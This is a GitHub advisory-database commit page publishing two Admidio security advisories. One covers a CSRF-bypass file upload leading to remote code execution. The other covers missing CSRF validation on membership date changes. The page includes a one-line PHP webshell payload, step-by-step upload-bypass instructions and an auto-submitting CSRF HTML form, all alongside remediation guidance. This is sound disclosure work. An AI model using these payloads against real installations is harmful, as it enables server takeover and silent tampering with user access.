Skip to content

Commit df4db7e

Browse files
advisory-database[bot]advisory-database[bot]
committed
Publish Advisories
GHSA-95cq-p4w2-32w5 GHSA-h8gr-qwr6-m9gx GHSA-wwg8-6ffr-h4q2
1 parent e3e1d84 commit df4db7e

3 files changed

Lines changed: 178 additions & 0 deletions

File tree

advisories/github-reviewed/2026/03/GHSA-95cq-p4w2-32w5/GHSA-95cq-p4w2-32w5.json

Lines changed: 60 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,60 @@
1+
{
2+
"schema_version": "1.4.0",
3+
"id": "GHSA-95cq-p4w2-32w5",
4+
"modified": "2026-03-16T21:16:50Z",
5+
"published": "2026-03-16T21:16:50Z",
6+
"aliases": [
7+
"CVE-2026-32756"
8+
],
9+
"summary": "File Upload(RCE) Vulnerability in admidio",
10+
"details": "### **Summary**\n\nA critical unrestricted file upload vulnerability exists in the Documents & Files module of Admidio. Due to a design flaw in how CSRF token validation and file extension verification interact within `UploadHandlerFile.php`, an authenticated user with upload permissions can bypass file extension restrictions by intentionally submitting an invalid CSRF token. This allows the upload of arbitrary file types, including PHP scripts, which may lead to Remote Code Execution (RCE) on the server.\n\n### **Details**\n\n**1. Critical - Unrestricted File Upload leading to Remote Code Execution (RCE)**\n\n**Root Cause Analysis:**\n\nThe root cause lies in a design flaw in `src/Infrastructure/Plugins/UploadHandlerFile.php`. The `UploadHandlerFile` class overrides two methods from its parent `UploadHandler` class:\n\n- `handle_form_data($file, $index)` — Validates the CSRF token. On failure, it sets `$file->error` and returns. The request is **not** terminated.\n- `handle_file_upload(...)` — Calls `parent::handle_file_upload()` to physically write the file to disk, then checks `if (!isset($file->error))` before running file extension validation (`allowedFileExtension()`).\n\nThe execution flow differs based on whether the CSRF token is valid:\n\n- **Valid CSRF token**: `handle_form_data()` does not set an error → extension check runs → invalid extension causes the uploaded file to be deleted from disk.\n- **Invalid CSRF token**: `handle_form_data()` sets `$file->error` → the `if (!isset($file->error))` guard in `handle_file_upload()` causes the extension validation to be skipped entirely → the cleanup code (`FileSystemUtils::deleteFileIfExists()`) is never reached → the file, already written to disk by the parent class, remains on the server and is directly accessible.\n\nIn summary, the file is always saved to disk by the parent class first. The extension check and cleanup only execute when no prior error exists. A deliberate CSRF token failure bypasses the extension filter while the file remains on disk.\n\n**Affected code** (`src/Infrastructure/Plugins/UploadHandlerFile.php`):\n\n```php\n// File is physically saved to disk here, before any Admidio-specific checks\n$file = parent::handle_file_upload($uploaded_file, $name, $size, $type, $error, $index, $content_range);\n\nif (!isset($file->error)) {\n // Extension validation is only reached when no prior error is set.\n // If CSRF validation failed in handle_form_data(), this block is skipped\n // and the uploaded file is never cleaned up from disk.\n if (!$newFile->allowedFileExtension()) {\n throw new Exception('SYS_FILE_EXTENSION_INVALID');\n }\n}\n```\n\n### **PoC**\n\nDocuments & Files Create folder\n<img width=\"762\" height=\"729\" alt=\"image\" src=\"https://github.com/user-attachments/assets/2c927482-851b-4945-93d6-6e7a1e3bc21f\" />\n\n<img width=\"749\" height=\"690\" alt=\"image\" src=\"https://github.com/user-attachments/assets/72443c87-e15f-4312-9659-8cd0661a4dae\" />\n\n\nFile Upload Try 1-1 (before request)\n<img width=\"1856\" height=\"635\" alt=\"image\" src=\"https://github.com/user-attachments/assets/d1ffaa12-aec1-45ff-a612-885d9554fb60\" />\n\n\nFile Upload Try 1-2 (after request)\n<img width=\"1850\" height=\"855\" alt=\"image\" src=\"https://github.com/user-attachments/assets/4ece4aac-1255-4189-9048-45ff3df4abcf\" />\n\n\n\nFile Upload Try 1-3 (After changing CSRF to a test value, request → PHP file upload succeeds)\n<img width=\"1847\" height=\"928\" alt=\"image\" src=\"https://github.com/user-attachments/assets/63f9d108-5e4f-4d32-96d2-09f9ad910873\" />\n\n\n✅ rcepoc.php Upload Success!\n<img width=\"926\" height=\"814\" alt=\"image\" src=\"https://github.com/user-attachments/assets/4de99c31-dc3c-44f2-9936-19c3da0dfffb\" />\n\n\nAccess the rcepoc upload path confirmed in the response and check the web shell.\n<img width=\"1635\" height=\"922\" alt=\"image\" src=\"https://github.com/user-attachments/assets/0b770caf-e737-4cbd-97b9-ae191a8b79f5\" />\n\n\n🆗 WebShell Success\n<img width=\"685\" height=\"187\" alt=\"image\" src=\"https://github.com/user-attachments/assets/e90f162b-7949-41c4-9fd1-aad3b6365adf\" />\n\n<img width=\"794\" height=\"209\" alt=\"image\" src=\"https://github.com/user-attachments/assets/f45dae74-a830-4761-af31-f2ac28eb2586\" />\n\n\n**Steps to Reproduce:**\n\n1. Log in to Admidio as an authenticated user with upload permissions on the Documents & Files module.\n2. Navigate to a folder in the Documents & Files module and open the file upload dialog.\n3. Intercept the upload POST request to `/system/file_upload.php?module=documents_files&mode=upload_files&uuid=<folder_uuid>` using a proxy tool such as Burp Suite.\n4. Replace the value of the `adm_csrf_token` field with an arbitrary invalid string (e.g., `webshellgogo`).\n5. Set the file to be uploaded to a PHP webshell (e.g., `<?php system($_GET[1]); ?>`).\n6. Forward the modified request.\n7. Observe that the server responds with HTTP `200 OK`. The JSON body contains `\"error\":\"Invalid or missing CSRF token!\"`, yet the file is physically present on the server at the path indicated in the `url` field.\n8. Access the uploaded PHP file directly via the URL provided in the response — arbitrary command execution is confirmed.\n\n### **Impact**\n\n- An authenticated attacker with upload permissions can bypass file extension validation and upload arbitrary server-side scripts such as PHP webshells.\n- This leads to Remote Code Execution (RCE), potentially resulting in full server compromise, sensitive data exfiltration, and lateral movement.\n- While authentication is required, the attack is not limited to administrators — any member granted upload rights may exploit this vulnerability, making the attack surface broader than it may initially appear.\n\n### **Remediation Measures**\n\n- The extension validation logic should be executed independently of the CSRF error state. It is recommended to move the extension check and the corresponding cleanup outside of the `if (!isset($file->error))` block so that files with disallowed extensions are always removed from disk, regardless of other errors.\n- Rather than relying on a blacklist of dangerous extensions (e.g., `.php`, `.phar`, `.phtml`), it is strongly recommended to implement a **whitelist** of permitted extensions appropriate to a documents module (e.g., `.pdf`, `.docx`, `.xlsx`, `.pptx`, `.txt`).\n- CSRF token validation should either be performed before the file is written to disk, or a validation failure should result in immediate request termination rather than merely setting an error flag on the file object.",
11+
"severity": [
12+
{
13+
"type": "CVSS_V3",
14+
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
15+
}
16+
],
17+
"affected": [
18+
{
19+
"package": {
20+
"ecosystem": "Packagist",
21+
"name": "admidio/admidio"
22+
},
23+
"ranges": [
24+
{
25+
"type": "ECOSYSTEM",
26+
"events": [
27+
{
28+
"introduced": "0"
29+
},
30+
{
31+
"fixed": "5.0.7"
32+
}
33+
]
34+
}
35+
],
36+
"database_specific": {
37+
"last_known_affected_version_range": "<= 5.0.6"
38+
}
39+
}
40+
],
41+
"references": [
42+
{
43+
"type": "WEB",
44+
"url": "https://github.com/Admidio/admidio/security/advisories/GHSA-95cq-p4w2-32w5"
45+
},
46+
{
47+
"type": "PACKAGE",
48+
"url": "https://github.com/Admidio/admidio"
49+
}
50+
],
51+
"database_specific": {
52+
"cwe_ids": [
53+
"CWE-434"
54+
],
55+
"severity": "HIGH",
56+
"github_reviewed": true,
57+
"github_reviewed_at": "2026-03-16T21:16:50Z",
58+
"nvd_published_at": null
59+
}
60+
}

advisories/github-reviewed/2026/03/GHSA-h8gr-qwr6-m9gx/GHSA-h8gr-qwr6-m9gx.json

Lines changed: 60 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,60 @@
1+
{
2+
"schema_version": "1.4.0",
3+
"id": "GHSA-h8gr-qwr6-m9gx",
4+
"modified": "2026-03-16T21:17:35Z",
5+
"published": "2026-03-16T21:17:34Z",
6+
"aliases": [
7+
"CVE-2026-32755"
8+
],
9+
"summary": "Admidio is Missing CSRF Protection on Role Membership Date Changes",
10+
"details": "## Summary\n\nThe `save_membership` action in `modules/profile/profile_function.php` saves changes to a member's role membership start and end dates but does not validate the CSRF token. The handler checks `stop_membership` and `remove_former_membership` against the CSRF token but omits `save_membership` from that check. Because membership UUIDs appear in the HTML source visible to authenticated users, an attacker can embed a crafted POST form on any external page and trick a role leader into submitting it, silently altering membership dates for any member of roles the victim leads.\n\n## Details\n\n### CSRF Check Is Absent for save_membership\n\nFile: `D:/bugcrowd/admidio/repo/modules/profile/profile_function.php`, lines 40-42\n\nThe CSRF guard covers only two of the three mutative modes:\n\n```php\nif (in_array($getMode, array('stop_membership', 'remove_former_membership'))) {\n // check the CSRF token of the form against the session token\n SecurityUtils::validateCsrfToken($_POST['adm_csrf_token']);\n}\n```\n\nThe `save_membership` mode is missing from this array. The handler then proceeds to read dates from `$_POST` and update the database without any token verification:\n\n```php\n} elseif ($getMode === 'save_membership') {\n $postMembershipStart = admFuncVariableIsValid($_POST, 'adm_membership_start_date', 'date', array('requireValue' => true));\n $postMembershipEnd = admFuncVariableIsValid($_POST, 'adm_membership_end_date', 'date', array('requireValue' => true));\n\n $member = new Membership($gDb);\n $member->readDataByUuid($getMemberUuid);\n $role = new Role($gDb, (int)$member->getValue('mem_rol_id'));\n\n // check if user has the right to edit this membership\n if (!$role->allowedToAssignMembers($gCurrentUser)) {\n throw new Exception('SYS_NO_RIGHTS');\n }\n // ... validates dates ...\n $role->setMembership($user->getValue('usr_id'), $postMembershipStart, $postMembershipEnd, ...);\n echo 'success';\n}\n```\n\nFile: `D:/bugcrowd/admidio/repo/modules/profile/profile_function.php`, lines 131-169\n\n### The Form Does Generate a CSRF Token (Not Validated)\n\nFile: `D:/bugcrowd/admidio/repo/modules/profile/roles_functions.php`, lines 218-241\n\nThe membership date form is created via `FormPresenter`, which automatically injects an `adm_csrf_token` hidden field into every form. However, the server-side `save_membership` handler never retrieves or validates this token. An attacker's forged form does not need to include the token at all, since the server does not check it.\n\n### Who Can Be Exploited as the CSRF Victim\n\nFile: `D:/bugcrowd/admidio/repo/src/Roles/Entity/Role.php`, lines 98-121\n\nThe `allowedToAssignMembers()` check grants write access to:\n- Any user who is `isAdministratorRoles()` (role administrators), or\n- Any user who is a leader of the target role when the role has `rol_leader_rights` set to `ROLE_LEADER_MEMBERS_ASSIGN` or `ROLE_LEADER_MEMBERS_ASSIGN_EDIT`\n\nRole leaders are not system administrators. They are regular members who have been designated as group leaders (e.g., a sports team captain or committee chair). This represents a low-privilege attack surface.\n\n### UUIDs Are Discoverable from HTML Source\n\nThe save URL for the membership date form is embedded in the profile page HTML:\n\n```\n/adm_program/modules/profile/profile_function.php?mode=save_membership&user_uuid=<UUID>&member_uuid=<UUID>\n```\n\nAny authenticated member who can view a profile page can extract both UUIDs from the page source.\n\n## PoC\n\nThe attacker hosts the following HTML page and tricks a role leader into visiting it while logged in to Admidio:\n\n```html\n<!DOCTYPE html>\n<html>\n<body onload=\"document.getElementById('csrf_form').submit()\">\n <form id=\"csrf_form\"\n method=\"POST\"\n action=\"https://TARGET/adm_program/modules/profile/profile_function.php?mode=save_membership&user_uuid=<VICTIM_USER_UUID>&member_uuid=<MEMBERSHIP_UUID>\">\n <input type=\"hidden\" name=\"adm_membership_start_date\" value=\"2000-01-01\">\n <input type=\"hidden\" name=\"adm_membership_end_date\" value=\"2000-01-02\">\n </form>\n</body>\n</html>\n```\n\nExpected result: The target member's role membership dates are overwritten to 2000-01-01 through 2000-01-02, effectively terminating their active membership immediately (end date is in the past).\n\nNote: No `adm_csrf_token` field is required because the server does not validate it for `save_membership`.\n\n## Impact\n\n- **Unauthorized membership date manipulation:** A role leader's session can be silently exploited to change start and end dates for any member of roles they lead. Setting the end date to a past date immediately terminates the member's active participation.\n- **Effective access revocation:** Membership in roles controls access to role-restricted features (events visible only to role members, document folders with upload rights, and mailing list memberships). Revoking membership via CSRF removes these access rights.\n- **Covert escalation:** An attacker could also extend a restricted membership period beyond its authorized end date, maintaining access for a user who should have been deactivated.\n- **No administrative approval required:** The impact occurs silently on the victim's session with no confirmation dialog or notification email.\n\n## Recommended Fix\n\n### Fix 1: Add `save_membership` to the existing CSRF validation check\n\n```php\n// File: modules/profile/profile_function.php, lines 40-42\nif (in_array($getMode, array('stop_membership', 'remove_former_membership', 'save_membership'))) {\n // check the CSRF token of the form against the session token\n SecurityUtils::validateCsrfToken($_POST['adm_csrf_token']);\n}\n```\n\n### Fix 2: Use the form-object validation pattern (consistent with other write endpoints)\n\n```php\n} elseif ($getMode === 'save_membership') {\n // Validate CSRF via form object (consistent pattern used by DocumentsService, etc.)\n $membershipForm = $gCurrentSession->getFormObject($_POST['adm_csrf_token']);\n $formValues = $membershipForm->validate($_POST);\n\n $postMembershipStart = $formValues['adm_membership_start_date'];\n $postMembershipEnd = $formValues['adm_membership_end_date'];\n // ... rest of save logic unchanged\n}\n```",
11+
"severity": [
12+
{
13+
"type": "CVSS_V3",
14+
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:H/A:N"
15+
}
16+
],
17+
"affected": [
18+
{
19+
"package": {
20+
"ecosystem": "Packagist",
21+
"name": "admidio/admidio"
22+
},
23+
"ranges": [
24+
{
25+
"type": "ECOSYSTEM",
26+
"events": [
27+
{
28+
"introduced": "0"
29+
},
30+
{
31+
"fixed": "5.0.7"
32+
}
33+
]
34+
}
35+
],
36+
"database_specific": {
37+
"last_known_affected_version_range": "<= 5.0.6"
38+
}
39+
}
40+
],
41+
"references": [
42+
{
43+
"type": "WEB",
44+
"url": "https://github.com/Admidio/admidio/security/advisories/GHSA-h8gr-qwr6-m9gx"
45+
},
46+
{
47+
"type": "PACKAGE",
48+
"url": "https://github.com/Admidio/admidio"
49+
}
50+
],
51+
"database_specific": {
52+
"cwe_ids": [
53+
"CWE-352"
54+
],
55+
"severity": "MODERATE",
56+
"github_reviewed": true,
57+
"github_reviewed_at": "2026-03-16T21:17:34Z",
58+
"nvd_published_at": null
59+
}
60+
}

0 commit comments

Comments
 (0)